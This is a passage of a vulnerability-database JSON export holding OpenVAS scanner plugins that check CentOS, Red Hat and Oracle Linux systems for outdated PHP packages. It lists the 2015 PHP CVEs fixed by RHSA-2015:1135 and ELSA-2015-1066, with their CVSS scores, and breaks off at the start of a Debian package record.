rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-intl\", rpm:\"php-intl~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysqlnd\", rpm:\"php-mysqlnd~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.4.16~36.el7_1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:50:27", "references": ["https://www.redhat.com/archives/rhsa-announce/2015-June/msg00023.html", "2015:1135-01"], "pluginID": "1361412562310871379", "description": "Check the version of php", "edition": 5, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-24T00:00:00", "title": "RedHat Update for php RHSA-2015:1135-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2006-7243", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-0231"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:1361412562310871379", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871379", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for php RHSA-2015:1135-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871379\");\n script_version(\"$Revision: 6689 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:50:06 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-24 06:13:17 +0200 (Wed, 24 Jun 2015)\");\n script_cve_id(\"CVE-2014-8142\", \"CVE-2014-9652\", \"CVE-2014-9705\", \"CVE-2014-9709\",\n \"CVE-2015-0231\", \"CVE-2015-0232\", \"CVE-2015-0273\", \"CVE-2015-2301\",\n \"CVE-2015-2348\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3307\",\n \"CVE-2015-3329\", \"CVE-2015-3330\", \"CVE-2015-3411\", \"CVE-2015-3412\",\n \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\",\n \"CVE-2015-4026\", \"CVE-2015-4147\", \"CVE-2015-4148\", \"CVE-2015-4598\",\n \"CVE-2015-4599\", \"CVE-2015-4600\", \"CVE-2015-4601\", \"CVE-2015-4602\",\n \"CVE-2015-4603\", \"CVE-2015-4604\", \"CVE-2015-4605\", \"CVE-2006-7243\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for php RHSA-2015:1135-01\");\n script_tag(name: \"summary\", value: \"Check the version of php\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw ...\n\n Description truncated, for more information please check the Reference URL\");\n script_tag(name: \"affected\", value: \"php on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"RHSA\", value: \"2015:1135-01\");\n script_xref(name: \"URL\" , value: \"https://www.redhat.com/archives/rhsa-announce/2015-June/msg00023.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-process\", rpm:\"php-process~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.4.16~36.el7_1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:47:08", "references": ["http://linux.oracle.com/errata/ELSA-2015-1066.html"], "pluginID": "1361412562310122874", "description": "Oracle Linux Local Security Checks ELSA-2015-1066", "edition": 4, "reporter": "Eero Volotinen", "published": "2016-02-05T00:00:00", "title": "Oracle Linux Local Check: ELSA-2015-1066", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2014-9427", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-2305", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4602", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4600", "CVE-2014-9652", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-1351", "CVE-2015-4599", "CVE-2015-0231"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:1361412562310122874", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122874", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Oracle Linux Local Check \n# $Id: ELSA-2015-1066.nasl 6552 2017-07-06 11:49:41Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@solinor.com> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.122874\");\nscript_version(\"$Revision: 6552 $\");\nscript_tag(name:\"creation_date\", value:\"2016-02-05 14:01:42 +0200 (Fri, 05 Feb 2016)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 13:49:41 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Oracle Linux Local Check: ELSA-2015-1066\");\nscript_tag(name: \"insight\", value: \"ELSA-2015-1066 - php54 security and bug fix update - php54[2.0-1]- fix incorrect selinux contexts #1194332php54-php[5.4.40-1]- rebase to PHP 5.4.40 for various security fix #1209887[5.4.37-1]- rebase to PHP 5.4.37[5.4.36-1]- rebase to PHP 5.4.36 #1168193- fix package name in description- php-fpm own session dirphp54-php-pecl-zendopcache[7.0.4-3]- fix use after free CVE-2015-1351[7.0.4-2]- add upstream patch for failed test[7.0.4-1]- Update to 7.0.4[7.0.3-1]- update to 7.0.3 #1055927\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_tag(name : \"summary\", value : \"Oracle Linux Local Security Checks ELSA-2015-1066\");\nscript_xref(name : \"URL\" , value : \"http://linux.oracle.com/errata/ELSA-2015-1066.html\");\nscript_cve_id(\"CVE-2014-9427\",\"CVE-2015-1351\",\"CVE-2015-2305\",\"CVE-2014-8142\",\"CVE-2014-9652\",\"CVE-2014-9705\",\"CVE-2014-9709\",\"CVE-2015-0231\",\"CVE-2015-0232\",\"CVE-2015-0273\",\"CVE-2015-2301\",\"CVE-2015-2348\",\"CVE-2015-2783\",\"CVE-2015-2787\",\"CVE-2015-3307\",\"CVE-2015-3329\",\"CVE-2015-3330\",\"CVE-2015-3411\",\"CVE-2015-3412\",\"CVE-2015-4147\",\"CVE-2015-4148\",\"CVE-2015-4599\",\"CVE-2015-4600\",\"CVE-2015-4601\",\"CVE-2015-4602\",\"CVE-2015-4603\",\"CVE-2015-4604\",\"CVE-2015-4605\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Oracle Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"php54\", rpm:\"php54~2.0~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php\", rpm:\"php54-php~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-bcmath\", rpm:\"php54-php-bcmath~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-cli\", rpm:\"php54-php-cli~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-common\", rpm:\"php54-php-common~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-dba\", rpm:\"php54-php-dba~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-devel\", rpm:\"php54-php-devel~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-enchant\", rpm:\"php54-php-enchant~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-fpm\", rpm:\"php54-php-fpm~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-gd\", rpm:\"php54-php-gd~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-intl\", rpm:\"php54-php-intl~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-ldap\", rpm:\"php54-php-ldap~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-mbstring\", rpm:\"php54-php-mbstring~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-mysqlnd\", rpm:\"php54-php-mysqlnd~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-odbc\", rpm:\"php54-php-odbc~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-pdo\", rpm:\"php54-php-pdo~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-pecl-zendopcache\", rpm:\"php54-php-pecl-zendopcache~7.0.4~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-pgsql\", rpm:\"php54-php-pgsql~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-process\", rpm:\"php54-php-process~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-pspell\", rpm:\"php54-php-pspell~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-recode\", rpm:\"php54-php-recode~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-snmp\", rpm:\"php54-php-snmp~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-soap\", rpm:\"php54-php-soap~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-xml\", rpm:\"php54-php-xml~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-xmlrpc\", rpm:\"php54-php-xmlrpc~5.4.40~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-runtime\", rpm:\"php54-runtime~2.0~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-scldevel\", rpm:\"php54-scldevel~2.0~1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"php54\", rpm:\"php54~2.0~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php\", rpm:\"php54-php~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-bcmath\", rpm:\"php54-php-bcmath~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-cli\", rpm:\"php54-php-cli~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-common\", rpm:\"php54-php-common~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-dba\", rpm:\"php54-php-dba~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-devel\", rpm:\"php54-php-devel~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-enchant\", rpm:\"php54-php-enchant~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-fpm\", rpm:\"php54-php-fpm~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-gd\", rpm:\"php54-php-gd~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-imap\", rpm:\"php54-php-imap~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-intl\", rpm:\"php54-php-intl~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-ldap\", rpm:\"php54-php-ldap~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-mbstring\", rpm:\"php54-php-mbstring~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-mysqlnd\", rpm:\"php54-php-mysqlnd~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-odbc\", rpm:\"php54-php-odbc~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-pdo\", rpm:\"php54-php-pdo~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-pecl-zendopcache\", rpm:\"php54-php-pecl-zendopcache~7.0.4~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-pgsql\", rpm:\"php54-php-pgsql~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-process\", rpm:\"php54-php-process~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-pspell\", rpm:\"php54-php-pspell~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-recode\", rpm:\"php54-php-recode~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-snmp\", rpm:\"php54-php-snmp~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-soap\", rpm:\"php54-php-soap~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-tidy\", rpm:\"php54-php-tidy~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-xml\", rpm:\"php54-php-xml~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-php-xmlrpc\", rpm:\"php54-php-xmlrpc~5.4.40~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-runtime\", rpm:\"php54-runtime~2.0~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n if ((res = isrpmvuln(pkg:\"php54-scldevel\", rpm:\"php54-scldevel~2.0~1.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0); \n }\n\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2016-09-02T18:32:21", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": "php5-mysql_5.4.39-0+deb7u2_all.deb", "arch": "all", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "5.4.39-0+deb7u2", "packageFilename": 